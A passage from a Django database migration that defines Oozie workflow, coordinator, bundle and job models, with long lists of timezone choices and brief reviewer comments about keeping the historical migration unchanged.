(b'Europe/Podgorica', b'Europe/Podgorica'), (b'Europe/Prague', b'Europe/Prague'), (b'Europe/Riga', b'Europe/Riga'), (b'Europe/Rome', b'Europe/Rome'), (b'Europe/Samara', b'Europe/Samara'), (b'Europe/San_Marino', b'Europe/San_Marino'), (b'Europe/Sarajevo', b'Europe/Sarajevo'), (b'Europe/Simferopol', b'Europe/Simferopol'), (b'Europe/Skopje', b'Europe/Skopje'), (b'Europe/Sofia', b'Europe/Sofia'), (b'Europe/Stockholm', b'Europe/Stockholm'), (b'Europe/Tallinn', b'Europe/Tallinn'), (b'Europe/Tirane', b'Europe/Tirane'), (b'Europe/Tiraspol', b'Europe/Tiraspol'), (b'Europe/Uzhgorod', b'Europe/Uzhgorod'), (b'Europe/Vaduz', b'Europe/Vaduz'), (b'Europe/Vatican', b'Europe/Vatican'), (b'Europe/Vienna', b'Europe/Vienna'), (b'Europe/Vilnius', b'Europe/Vilnius'), (b'Europe/Volgograd', b'Europe/Volgograd'), (b'Europe/Warsaw', b'Europe/Warsaw'), (b'Europe/Zagreb', b'Europe/Zagreb'), (b'Europe/Zaporozhye', b'Europe/Zaporozhye'), (b'Europe/Zurich', b'Europe/Zurich'), 
(b'Factory', b'Factory'), (b'GB', b'GB'), (b'GB-Eire', b'GB-Eire'), (b'GMT', b'GMT'), (b'GMT+0', b'GMT+0'), (b'GMT+1', b'GMT+1'), (b'GMT+10', b'GMT+10'), (b'GMT+11', b'GMT+11'), (b'GMT+12', b'GMT+12'), (b'GMT+13', b'GMT+13'), (b'GMT+14', b'GMT+14'), (b'GMT+2', b'GMT+2'), (b'GMT+3', b'GMT+3'), (b'GMT+4', b'GMT+4'), (b'GMT+5', b'GMT+5'), (b'GMT+6', b'GMT+6'), (b'GMT+7', b'GMT+7'), (b'GMT+8', b'GMT+8'), (b'GMT+9', b'GMT+9'), (b'GMT-0', b'GMT-0'), (b'GMT-1', b'GMT-1'), (b'GMT-10', b'GMT-10'), (b'GMT-11', b'GMT-11'), (b'GMT-12', b'GMT-12'), (b'GMT-2', b'GMT-2'), (b'GMT-3', b'GMT-3'), (b'GMT-4', b'GMT-4'), (b'GMT-5', b'GMT-5'), (b'GMT-6', b'GMT-6'), (b'GMT-7', b'GMT-7'), (b'GMT-8', b'GMT-8'), (b'GMT-9', b'GMT-9'), (b'GMT0', b'GMT0'), (b'Greenwich', b'Greenwich'), (b'HST', b'HST'), (b'Hongkong', b'Hongkong'), (b'Iceland', b'Iceland'), (b'Indian/Antananarivo', b'Indian/Antananarivo'), (b'Indian/Chagos', b'Indian/Chagos'), (b'Indian/Christmas', b'Indian/Christmas'), (b'Indian/Cocos', b'Indian/Cocos'), (b'Indian/Comoro', b'Indian/Comoro'), (b'Indian/Kerguelen', b'Indian/Kerguelen'), (b'Indian/Mahe', b'Indian/Mahe'), (b'Indian/Maldives', b'Indian/Maldives'), (b'Indian/Mauritius', b'Indian/Mauritius'), (b'Indian/Mayotte', b'Indian/Mayotte'), (b'Indian/Reunion', b'Indian/Reunion'), (b'Iran', b'Iran'), (b'Israel', b'Israel'), (b'Jamaica', b'Jamaica'), (b'Japan', b'Japan'), (b'Kwajalein', b'Kwajalein'), (b'Libya', b'Libya'), (b'MET', b'MET'), (b'MST', b'MST'), (b'MST7MDT', b'MST7MDT'), (b'Mexico/BajaNorte', b'Mexico/BajaNorte'), (b'Mexico/BajaSur', b'Mexico/BajaSur'), (b'Mexico/General', b'Mexico/General'), (b'Mideast/Riyadh87', b'Mideast/Riyadh87'), (b'Mideast/Riyadh88', b'Mideast/Riyadh88'), (b'Mideast/Riyadh89', b'Mideast/Riyadh89'), (b'NZ', b'NZ'), (b'NZ-CHAT', b'NZ-CHAT'), (b'Navajo', b'Navajo'), (b'PRC', b'PRC'), (b'PST8PDT', b'PST8PDT'), (b'Pacific/Apia', b'Pacific/Apia'), (b'Pacific/Auckland', b'Pacific/Auckland'), (b'Pacific/Chatham', b'Pacific/Chatham'), 
(b'Pacific/Chuuk', b'Pacific/Chuuk'), (b'Pacific/Easter', b'Pacific/Easter'), (b'Pacific/Efate', b'Pacific/Efate'), (b'Pacific/Enderbury', b'Pacific/Enderbury'), (b'Pacific/Fakaofo', b'Pacific/Fakaofo'), (b'Pacific/Fiji', b'Pacific/Fiji'), (b'Pacific/Funafuti', b'Pacific/Funafuti'), (b'Pacific/Galapagos', b'Pacific/Galapagos'), (b'Pacific/Gambier', b'Pacific/Gambier'), (b'Pacific/Guadalcanal', b'Pacific/Guadalcanal'), (b'Pacific/Guam', b'Pacific/Guam'), (b'Pacific/Honolulu', b'Pacific/Honolulu'), (b'Pacific/Johnston', b'Pacific/Johnston'), (b'Pacific/Kiritimati', b'Pacific/Kiritimati'), (b'Pacific/Kosrae', b'Pacific/Kosrae'), (b'Pacific/Kwajalein', b'Pacific/Kwajalein'), (b'Pacific/Majuro', b'Pacific/Majuro'), (b'Pacific/Marquesas', b'Pacific/Marquesas'), (b'Pacific/Midway', b'Pacific/Midway'), (b'Pacific/Nauru', b'Pacific/Nauru'), (b'Pacific/Niue', b'Pacific/Niue'), (b'Pacific/Norfolk', b'Pacific/Norfolk'), (b'Pacific/Noumea', b'Pacific/Noumea'), (b'Pacific/Pago_Pago', b'Pacific/Pago_Pago'), (b'Pacific/Palau', b'Pacific/Palau'), (b'Pacific/Pitcairn', b'Pacific/Pitcairn'), (b'Pacific/Pohnpei', b'Pacific/Pohnpei'), (b'Pacific/Ponape', b'Pacific/Ponape'), (b'Pacific/Port_Moresby', b'Pacific/Port_Moresby'), (b'Pacific/Rarotonga', b'Pacific/Rarotonga'), (b'Pacific/Saipan', b'Pacific/Saipan'), (b'Pacific/Samoa', b'Pacific/Samoa'), (b'Pacific/Tahiti', b'Pacific/Tahiti'), (b'Pacific/Tarawa', b'Pacific/Tarawa'), (b'Pacific/Tongatapu', b'Pacific/Tongatapu'), (b'Pacific/Truk', b'Pacific/Truk'), (b'Pacific/Wake', b'Pacific/Wake'), (b'Pacific/Wallis', b'Pacific/Wallis'), (b'Pacific/Yap', b'Pacific/Yap'), (b'Poland', b'Poland'), (b'Portugal', b'Portugal'), (b'ROC', b'ROC'), (b'ROK', b'ROK'), (b'Singapore', b'Singapore'), (b'Turkey', b'Turkey'), (b'UCT', b'UCT'), (b'US/Alaska', b'US/Alaska'), (b'US/Aleutian', b'US/Aleutian'), (b'US/Arizona', b'US/Arizona'), (b'US/Central', b'US/Central'), (b'US/East-Indiana', b'US/East-Indiana'), (b'US/Eastern', b'US/Eastern'), (b'US/Hawaii', 
b'US/Hawaii'), (b'US/Indiana-Starke', b'US/Indiana-Starke'), (b'US/Michigan', b'US/Michigan'), (b'US/Mountain', b'US/Mountain'), (b'US/Pacific', b'US/Pacific'), (b'US/Pacific-New', b'US/Pacific-New'), (b'US/Samoa', b'US/Samoa'), (b'Universal', b'Universal'), (b'W-SU', b'W-SU'), (b'WET', b'WET'), (b'Zulu', b'Zulu')], default=b'America/Los_Angeles', help_text='The timezone of the dataset. Only used for managing the daylight saving time changes when combining several datasets.', max_length=24, verbose_name='Timezone')),
('done_flag', models.CharField(blank=True, default=b'', help_text='The done file for the data set. If the Done flag is not specified, then Oozie configures Hadoop to create a _SUCCESS file in the output directory. If Done flag is set to empty, then Coordinator looks for the existence of the directory itself.', max_length=64, verbose_name='Done flag')),
('instance_choice', models.CharField(default=b'default', help_text='Customize the date instance(s), e.g. define a range of dates, use EL functions...', max_length=10, verbose_name='Instance type')),
('advanced_start_instance', models.CharField(default=b'0', help_text='Shift the frequency for gettting past/future start date or enter verbatim the Oozie start instance, e.g. ${coord:current(0)}', max_length=128, verbose_name='Start instance')),
('advanced_end_instance', models.CharField(blank=True, default=b'0', help_text='Optional: Shift the frequency for gettting past/future end dates or enter verbatim the Oozie end instance.', max_length=128, verbose_name='End instance')),
],
),
migrations.CreateModel(
name='History',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('submission_date', models.DateTimeField(auto_now=True, db_index=True)),
('oozie_job_id', models.CharField(max_length=128)),
('properties', models.TextField()),
],
),
migrations.CreateModel(
name='Job',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(help_text='Name of the job, which must be unique per user.', max_length=255, validators=[django.core.validators.RegexValidator(message='Enter a valid value: combination of 2 - 40 letters and digits starting by a letter', regex=b'^[a-zA-Z_][\\-_a-zA-Z0-9]{1,39}$')], verbose_name='Name')),
('description', models.CharField(blank=True, help_text='The purpose of the job.', max_length=1024, verbose_name='Description')),
('last_modified', models.DateTimeField(auto_now=True, db_index=True, verbose_name='Last modified')),
('schema_version', models.CharField(help_text='The version of the XML schema used to talk to Oozie.', max_length=128, verbose_name='Schema version')),
('deployment_dir', models.CharField(blank=True, help_text='The path on the HDFS where all the workflows and dependencies must be uploaded.', max_length=1024, verbose_name='HDFS deployment directory')),
('is_shared', models.BooleanField(db_index=True, default=False, help_text='Enable other users to have access to this job.', verbose_name='Is shared')),
('parameters', models.TextField(default=b'[{"name":"oozie.use.system.libpath","value":"true"}]', help_text='Parameters used at the submission time (e.g. market=US, oozie.use.system.libpath=true).', verbose_name='Oozie parameters')),
('is_trashed', models.BooleanField(db_index=True, default=False, help_text='If this job is trashed.', verbose_name='Is trashed')),
('data', models.TextField(blank=True, default=b'{}')),
],
),
migrations.CreateModel(
name='Link',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=40)),
('comment', models.CharField(blank=True, default=b'', max_length=1024)),
],
),
# Node: base model for every workflow action/control node (concrete
# subclasses below inherit from it via multi-table inheritance,
# bases=('oozie.node',)).
migrations.CreateModel(
name='Node',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
# Regex allows a leading letter/underscore plus 1-39 further chars,
# i.e. 2-40 chars total, matching the validator message.
('name', models.CharField(help_text='Name of the action, which must be unique by workflow.', max_length=255, validators=[django.core.validators.RegexValidator(message='Enter a valid value: combination of 2 - 40 letters and digits starting by a letter', regex=b'^[a-zA-Z_][\\-_a-zA-Z0-9]{1,39}$')], verbose_name='Name')),
('description', models.CharField(blank=True, default=b'', help_text='The purpose of the action.', max_length=1024, verbose_name='Description')),
('node_type', models.CharField(help_text='The type of action (e.g. MapReduce, Pig...)', max_length=64, verbose_name='Type')),
# Free-form JSON blob (default '{}') holding node-specific settings.
('data', models.TextField(blank=True, default=b'{}')),
],
),
# Bundle: an Oozie bundle job; multi-table child of Job (job_ptr is the
# parent link and primary key).
migrations.CreateModel(
name='Bundle',
fields=[
('job_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Job')),
# NOTE(review): auto_now=True makes Django overwrite this field on
# every save, which conflicts with the help text ("When to start the
# first coordinators"). This mirrors the model definition at the time
# the migration was generated — do not edit a historical migration;
# fix (if needed) belongs in the model + a new migration.
('kick_off_time', models.DateTimeField(auto_now=True, help_text='When to start the first coordinators.', verbose_name='Start')),
],
bases=('oozie.job',),
),
# Coordinator: an Oozie coordinator job; multi-table child of Job.
# Scheduling is expressed as frequency_number (1-60) x frequency_unit
# (minutes/hours/days/months) in a given timezone, between start and end.
migrations.CreateModel(
name='Coordinator',
fields=[
('job_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Job')),
# choices enumerate 1..60 literally — generator output; left verbatim.
('frequency_number', models.SmallIntegerField(choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10), (11, 11), (12, 12), (13, 13), (14, 14), (15, 15), (16, 16), (17, 17), (18, 18), (19, 19), (20, 20), (21, 21), (22, 22), (23, 23), (24, 24), (25, 25), (26, 26), (27, 27), (28, 28), (29, 29), (30, 30), (31, 31), (32, 32), (33, 33), (34, 34), (35, 35), (36, 36), (37, 37), (38, 38), (39, 39), (40, 40), (41, 41), (42, 42), (43, 43), (44, 44), (45, 45), (46, 46), (47, 47), (48, 48), (49, 49), (50, 50), (51, 51), (52, 52), (53, 53), (54, 54), (55, 55), (56, 56), (57, 57), (58, 58), (59, 59), (60, 60)], default=1, help_text='The number of units of the rate at which data is periodically created.', verbose_name='Frequency number')),
('frequency_unit', models.CharField(choices=[(b'minutes', 'Minutes'), (b'hours', 'Hours'), (b'days', 'Days'), (b'months', 'Months')], default=b'days', help_text='The unit of the rate at which data is periodically created.', max_length=20, verbose_name='Frequency unit')),
# Full tz-database name list frozen at generation time (presumably
# from pytz — TODO confirm); kept byte-for-byte: this is historical
# migration state.
('timezone', models.CharField(choices=[(b'Africa/Abidjan', b'Africa/Abidjan'), (b'Africa/Accra', b'Africa/Accra'), (b'Africa/Addis_Ababa', b'Africa/Addis_Ababa'), (b'Africa/Algiers', b'Africa/Algiers'), (b'Africa/Asmara', b'Africa/Asmara'), (b'Africa/Asmera', b'Africa/Asmera'), (b'Africa/Bamako', b'Africa/Bamako'), (b'Africa/Bangui', b'Africa/Bangui'), (b'Africa/Banjul', b'Africa/Banjul'), (b'Africa/Bissau', b'Africa/Bissau'), (b'Africa/Blantyre', b'Africa/Blantyre'), (b'Africa/Brazzaville', b'Africa/Brazzaville'), (b'Africa/Bujumbura', b'Africa/Bujumbura'), (b'Africa/Cairo', b'Africa/Cairo'), (b'Africa/Casablanca', b'Africa/Casablanca'), (b'Africa/Ceuta', b'Africa/Ceuta'), (b'Africa/Conakry', b'Africa/Conakry'), (b'Africa/Dakar', b'Africa/Dakar'), (b'Africa/Dar_es_Salaam', b'Africa/Dar_es_Salaam'), (b'Africa/Djibouti', b'Africa/Djibouti'), (b'Africa/Douala', b'Africa/Douala'), (b'Africa/El_Aaiun', b'Africa/El_Aaiun'), (b'Africa/Freetown', b'Africa/Freetown'), (b'Africa/Gaborone', b'Africa/Gaborone'), (b'Africa/Harare', b'Africa/Harare'), (b'Africa/Johannesburg', b'Africa/Johannesburg'), (b'Africa/Juba', b'Africa/Juba'), (b'Africa/Kampala', b'Africa/Kampala'), (b'Africa/Khartoum', b'Africa/Khartoum'), (b'Africa/Kigali', b'Africa/Kigali'), (b'Africa/Kinshasa', b'Africa/Kinshasa'), (b'Africa/Lagos', b'Africa/Lagos'), (b'Africa/Libreville', b'Africa/Libreville'), (b'Africa/Lome', b'Africa/Lome'), (b'Africa/Luanda', b'Africa/Luanda'), (b'Africa/Lubumbashi', b'Africa/Lubumbashi'), (b'Africa/Lusaka', b'Africa/Lusaka'), (b'Africa/Malabo', b'Africa/Malabo'), (b'Africa/Maputo', b'Africa/Maputo'), (b'Africa/Maseru', b'Africa/Maseru'), (b'Africa/Mbabane', b'Africa/Mbabane'), (b'Africa/Mogadishu', b'Africa/Mogadishu'), (b'Africa/Monrovia', b'Africa/Monrovia'), (b'Africa/Nairobi', b'Africa/Nairobi'), (b'Africa/Ndjamena', b'Africa/Ndjamena'), (b'Africa/Niamey', b'Africa/Niamey'), (b'Africa/Nouakchott', b'Africa/Nouakchott'), (b'Africa/Ouagadougou', b'Africa/Ouagadougou'), 
(b'Africa/Porto-Novo', b'Africa/Porto-Novo'), (b'Africa/Sao_Tome', b'Africa/Sao_Tome'), (b'Africa/Timbuktu', b'Africa/Timbuktu'), (b'Africa/Tripoli', b'Africa/Tripoli'), (b'Africa/Tunis', b'Africa/Tunis'), (b'Africa/Windhoek', b'Africa/Windhoek'), (b'America/Adak', b'America/Adak'), (b'America/Anchorage', b'America/Anchorage'), (b'America/Anguilla', b'America/Anguilla'), (b'America/Antigua', b'America/Antigua'), (b'America/Araguaina', b'America/Araguaina'), (b'America/Argentina/Buenos_Aires', b'America/Argentina/Buenos_Aires'), (b'America/Argentina/Catamarca', b'America/Argentina/Catamarca'), (b'America/Argentina/ComodRivadavia', b'America/Argentina/ComodRivadavia'), (b'America/Argentina/Cordoba', b'America/Argentina/Cordoba'), (b'America/Argentina/Jujuy', b'America/Argentina/Jujuy'), (b'America/Argentina/La_Rioja', b'America/Argentina/La_Rioja'), (b'America/Argentina/Mendoza', b'America/Argentina/Mendoza'), (b'America/Argentina/Rio_Gallegos', b'America/Argentina/Rio_Gallegos'), (b'America/Argentina/Salta', b'America/Argentina/Salta'), (b'America/Argentina/San_Juan', b'America/Argentina/San_Juan'), (b'America/Argentina/San_Luis', b'America/Argentina/San_Luis'), (b'America/Argentina/Tucuman', b'America/Argentina/Tucuman'), (b'America/Argentina/Ushuaia', b'America/Argentina/Ushuaia'), (b'America/Aruba', b'America/Aruba'), (b'America/Asuncion', b'America/Asuncion'), (b'America/Atikokan', b'America/Atikokan'), (b'America/Atka', b'America/Atka'), (b'America/Bahia', b'America/Bahia'), (b'America/Bahia_Banderas', b'America/Bahia_Banderas'), (b'America/Barbados', b'America/Barbados'), (b'America/Belem', b'America/Belem'), (b'America/Belize', b'America/Belize'), (b'America/Blanc-Sablon', b'America/Blanc-Sablon'), (b'America/Boa_Vista', b'America/Boa_Vista'), (b'America/Bogota', b'America/Bogota'), (b'America/Boise', b'America/Boise'), (b'America/Buenos_Aires', b'America/Buenos_Aires'), (b'America/Cambridge_Bay', b'America/Cambridge_Bay'), (b'America/Campo_Grande', 
b'America/Campo_Grande'), (b'America/Cancun', b'America/Cancun'), (b'America/Caracas', b'America/Caracas'), (b'America/Catamarca', b'America/Catamarca'), (b'America/Cayenne', b'America/Cayenne'), (b'America/Cayman', b'America/Cayman'), (b'America/Chicago', b'America/Chicago'), (b'America/Chihuahua', b'America/Chihuahua'), (b'America/Coral_Harbour', b'America/Coral_Harbour'), (b'America/Cordoba', b'America/Cordoba'), (b'America/Costa_Rica', b'America/Costa_Rica'), (b'America/Creston', b'America/Creston'), (b'America/Cuiaba', b'America/Cuiaba'), (b'America/Curacao', b'America/Curacao'), (b'America/Danmarkshavn', b'America/Danmarkshavn'), (b'America/Dawson', b'America/Dawson'), (b'America/Dawson_Creek', b'America/Dawson_Creek'), (b'America/Denver', b'America/Denver'), (b'America/Detroit', b'America/Detroit'), (b'America/Dominica', b'America/Dominica'), (b'America/Edmonton', b'America/Edmonton'), (b'America/Eirunepe', b'America/Eirunepe'), (b'America/El_Salvador', b'America/El_Salvador'), (b'America/Ensenada', b'America/Ensenada'), (b'America/Fort_Wayne', b'America/Fort_Wayne'), (b'America/Fortaleza', b'America/Fortaleza'), (b'America/Glace_Bay', b'America/Glace_Bay'), (b'America/Godthab', b'America/Godthab'), (b'America/Goose_Bay', b'America/Goose_Bay'), (b'America/Grand_Turk', b'America/Grand_Turk'), (b'America/Grenada', b'America/Grenada'), (b'America/Guadeloupe', b'America/Guadeloupe'), (b'America/Guatemala', b'America/Guatemala'), (b'America/Guayaquil', b'America/Guayaquil'), (b'America/Guyana', b'America/Guyana'), (b'America/Halifax', b'America/Halifax'), (b'America/Havana', b'America/Havana'), (b'America/Hermosillo', b'America/Hermosillo'), (b'America/Indiana/Indianapolis', b'America/Indiana/Indianapolis'), (b'America/Indiana/Knox', b'America/Indiana/Knox'), (b'America/Indiana/Marengo', b'America/Indiana/Marengo'), (b'America/Indiana/Petersburg', b'America/Indiana/Petersburg'), (b'America/Indiana/Tell_City', b'America/Indiana/Tell_City'), 
(b'America/Indiana/Vevay', b'America/Indiana/Vevay'), (b'America/Indiana/Vincennes', b'America/Indiana/Vincennes'), (b'America/Indiana/Winamac', b'America/Indiana/Winamac'), (b'America/Indianapolis', b'America/Indianapolis'), (b'America/Inuvik', b'America/Inuvik'), (b'America/Iqaluit', b'America/Iqaluit'), (b'America/Jamaica', b'America/Jamaica'), (b'America/Jujuy', b'America/Jujuy'), (b'America/Juneau', b'America/Juneau'), (b'America/Kentucky/Louisville', b'America/Kentucky/Louisville'), (b'America/Kentucky/Monticello', b'America/Kentucky/Monticello'), (b'America/Knox_IN', b'America/Knox_IN'), (b'America/Kralendijk', b'America/Kralendijk'), (b'America/La_Paz', b'America/La_Paz'), (b'America/Lima', b'America/Lima'), (b'America/Los_Angeles', b'America/Los_Angeles'), (b'America/Louisville', b'America/Louisville'), (b'America/Lower_Princes', b'America/Lower_Princes'), (b'America/Maceio', b'America/Maceio'), (b'America/Managua', b'America/Managua'), (b'America/Manaus', b'America/Manaus'), (b'America/Marigot', b'America/Marigot'), (b'America/Martinique', b'America/Martinique'), (b'America/Matamoros', b'America/Matamoros'), (b'America/Mazatlan', b'America/Mazatlan'), (b'America/Mendoza', b'America/Mendoza'), (b'America/Menominee', b'America/Menominee'), (b'America/Merida', b'America/Merida'), (b'America/Metlakatla', b'America/Metlakatla'), (b'America/Mexico_City', b'America/Mexico_City'), (b'America/Miquelon', b'America/Miquelon'), (b'America/Moncton', b'America/Moncton'), (b'America/Monterrey', b'America/Monterrey'), (b'America/Montevideo', b'America/Montevideo'), (b'America/Montreal', b'America/Montreal'), (b'America/Montserrat', b'America/Montserrat'), (b'America/Nassau', b'America/Nassau'), (b'America/New_York', b'America/New_York'), (b'America/Nipigon', b'America/Nipigon'), (b'America/Nome', b'America/Nome'), (b'America/Noronha', b'America/Noronha'), (b'America/North_Dakota/Beulah', b'America/North_Dakota/Beulah'), (b'America/North_Dakota/Center', 
b'America/North_Dakota/Center'), (b'America/North_Dakota/New_Salem', b'America/North_Dakota/New_Salem'), (b'America/Ojinaga', b'America/Ojinaga'), (b'America/Panama', b'America/Panama'), (b'America/Pangnirtung', b'America/Pangnirtung'), (b'America/Paramaribo', b'America/Paramaribo'), (b'America/Phoenix', b'America/Phoenix'), (b'America/Port-au-Prince', b'America/Port-au-Prince'), (b'America/Port_of_Spain', b'America/Port_of_Spain'), (b'America/Porto_Acre', b'America/Porto_Acre'), (b'America/Porto_Velho', b'America/Porto_Velho'), (b'America/Puerto_Rico', b'America/Puerto_Rico'), (b'America/Rainy_River', b'America/Rainy_River'), (b'America/Rankin_Inlet', b'America/Rankin_Inlet'), (b'America/Recife', b'America/Recife'), (b'America/Regina', b'America/Regina'), (b'America/Resolute', b'America/Resolute'), (b'America/Rio_Branco', b'America/Rio_Branco'), (b'America/Rosario', b'America/Rosario'), (b'America/Santa_Isabel', b'America/Santa_Isabel'), (b'America/Santarem', b'America/Santarem'), (b'America/Santiago', b'America/Santiago'), (b'America/Santo_Domingo', b'America/Santo_Domingo'), (b'America/Sao_Paulo', b'America/Sao_Paulo'), (b'America/Scoresbysund', b'America/Scoresbysund'), (b'America/Shiprock', b'America/Shiprock'), (b'America/Sitka', b'America/Sitka'), (b'America/St_Barthelemy', b'America/St_Barthelemy'), (b'America/St_Johns', b'America/St_Johns'), (b'America/St_Kitts', b'America/St_Kitts'), (b'America/St_Lucia', b'America/St_Lucia'), (b'America/St_Thomas', b'America/St_Thomas'), (b'America/St_Vincent', b'America/St_Vincent'), (b'America/Swift_Current', b'America/Swift_Current'), (b'America/Tegucigalpa', b'America/Tegucigalpa'), (b'America/Thule', b'America/Thule'), (b'America/Thunder_Bay', b'America/Thunder_Bay'), (b'America/Tijuana', b'America/Tijuana'), (b'America/Toronto', b'America/Toronto'), (b'America/Tortola', b'America/Tortola'), (b'America/Vancouver', b'America/Vancouver'), (b'America/Virgin', b'America/Virgin'), (b'America/Whitehorse', 
b'America/Whitehorse'), (b'America/Winnipeg', b'America/Winnipeg'), (b'America/Yakutat', b'America/Yakutat'), (b'America/Yellowknife', b'America/Yellowknife'), (b'Antarctica/Casey', b'Antarctica/Casey'), (b'Antarctica/Davis', b'Antarctica/Davis'), (b'Antarctica/DumontDUrville', b'Antarctica/DumontDUrville'), (b'Antarctica/Macquarie', b'Antarctica/Macquarie'), (b'Antarctica/Mawson', b'Antarctica/Mawson'), (b'Antarctica/McMurdo', b'Antarctica/McMurdo'), (b'Antarctica/Palmer', b'Antarctica/Palmer'), (b'Antarctica/Rothera', b'Antarctica/Rothera'), (b'Antarctica/South_Pole', b'Antarctica/South_Pole'), (b'Antarctica/Syowa', b'Antarctica/Syowa'), (b'Antarctica/Vostok', b'Antarctica/Vostok'), (b'Arctic/Longyearbyen', b'Arctic/Longyearbyen'), (b'Asia/Aden', b'Asia/Aden'), (b'Asia/Almaty', b'Asia/Almaty'), (b'Asia/Amman', b'Asia/Amman'), (b'Asia/Anadyr', b'Asia/Anadyr'), (b'Asia/Aqtau', b'Asia/Aqtau'), (b'Asia/Aqtobe', b'Asia/Aqtobe'), (b'Asia/Ashgabat', b'Asia/Ashgabat'), (b'Asia/Ashkhabad', b'Asia/Ashkhabad'), (b'Asia/Baghdad', b'Asia/Baghdad'), (b'Asia/Bahrain', b'Asia/Bahrain'), (b'Asia/Baku', b'Asia/Baku'), (b'Asia/Bangkok', b'Asia/Bangkok'), (b'Asia/Beijing', b'Asia/Beijing'), (b'Asia/Beirut', b'Asia/Beirut'), (b'Asia/Bishkek', b'Asia/Bishkek'), (b'Asia/Brunei', b'Asia/Brunei'), (b'Asia/Calcutta', b'Asia/Calcutta'), (b'Asia/Choibalsan', b'Asia/Choibalsan'), (b'Asia/Chongqing', b'Asia/Chongqing'), (b'Asia/Chungking', b'Asia/Chungking'), (b'Asia/Colombo', b'Asia/Colombo'), (b'Asia/Dacca', b'Asia/Dacca'), (b'Asia/Damascus', b'Asia/Damascus'), (b'Asia/Dhaka', b'Asia/Dhaka'), (b'Asia/Dili', b'Asia/Dili'), (b'Asia/Dubai', b'Asia/Dubai'), (b'Asia/Dushanbe', b'Asia/Dushanbe'), (b'Asia/Gaza', b'Asia/Gaza'), (b'Asia/Harbin', b'Asia/Harbin'), (b'Asia/Hebron', b'Asia/Hebron'), (b'Asia/Ho_Chi_Minh', b'Asia/Ho_Chi_Minh'), (b'Asia/Hong_Kong', b'Asia/Hong_Kong'), (b'Asia/Hovd', b'Asia/Hovd'), (b'Asia/Irkutsk', b'Asia/Irkutsk'), (b'Asia/Istanbul', b'Asia/Istanbul'), (b'Asia/Jakarta', 
b'Asia/Jakarta'), (b'Asia/Jayapura', b'Asia/Jayapura'), (b'Asia/Jerusalem', b'Asia/Jerusalem'), (b'Asia/Kabul', b'Asia/Kabul'), (b'Asia/Kamchatka', b'Asia/Kamchatka'), (b'Asia/Karachi', b'Asia/Karachi'), (b'Asia/Kashgar', b'Asia/Kashgar'), (b'Asia/Kathmandu', b'Asia/Kathmandu'), (b'Asia/Katmandu', b'Asia/Katmandu'), (b'Asia/Kolkata', b'Asia/Kolkata'), (b'Asia/Krasnoyarsk', b'Asia/Krasnoyarsk'), (b'Asia/Kuala_Lumpur', b'Asia/Kuala_Lumpur'), (b'Asia/Kuching', b'Asia/Kuching'), (b'Asia/Kuwait', b'Asia/Kuwait'), (b'Asia/Macao', b'Asia/Macao'), (b'Asia/Macau', b'Asia/Macau'), (b'Asia/Magadan', b'Asia/Magadan'), (b'Asia/Makassar', b'Asia/Makassar'), (b'Asia/Manila', b'Asia/Manila'), (b'Asia/Muscat', b'Asia/Muscat'), (b'Asia/Nicosia', b'Asia/Nicosia'), (b'Asia/Novokuznetsk', b'Asia/Novokuznetsk'), (b'Asia/Novosibirsk', b'Asia/Novosibirsk'), (b'Asia/Omsk', b'Asia/Omsk'), (b'Asia/Oral', b'Asia/Oral'), (b'Asia/Phnom_Penh', b'Asia/Phnom_Penh'), (b'Asia/Pontianak', b'Asia/Pontianak'), (b'Asia/Pyongyang', b'Asia/Pyongyang'), (b'Asia/Qatar', b'Asia/Qatar'), (b'Asia/Qyzylorda', b'Asia/Qyzylorda'), (b'Asia/Rangoon', b'Asia/Rangoon'), (b'Asia/Riyadh', b'Asia/Riyadh'), (b'Asia/Riyadh87', b'Asia/Riyadh87'), (b'Asia/Riyadh88', b'Asia/Riyadh88'), (b'Asia/Riyadh89', b'Asia/Riyadh89'), (b'Asia/Saigon', b'Asia/Saigon'), (b'Asia/Sakhalin', b'Asia/Sakhalin'), (b'Asia/Samarkand', b'Asia/Samarkand'), (b'Asia/Seoul', b'Asia/Seoul'), (b'Asia/Shanghai', b'Asia/Shanghai'), (b'Asia/Singapore', b'Asia/Singapore'), (b'Asia/Taipei', b'Asia/Taipei'), (b'Asia/Tashkent', b'Asia/Tashkent'), (b'Asia/Tbilisi', b'Asia/Tbilisi'), (b'Asia/Tehran', b'Asia/Tehran'), (b'Asia/Tel_Aviv', b'Asia/Tel_Aviv'), (b'Asia/Thimbu', b'Asia/Thimbu'), (b'Asia/Thimphu', b'Asia/Thimphu'), (b'Asia/Tokyo', b'Asia/Tokyo'), (b'Asia/Ujung_Pandang', b'Asia/Ujung_Pandang'), (b'Asia/Ulaanbaatar', b'Asia/Ulaanbaatar'), (b'Asia/Ulan_Bator', b'Asia/Ulan_Bator'), (b'Asia/Urumqi', b'Asia/Urumqi'), (b'Asia/Vientiane', b'Asia/Vientiane'), 
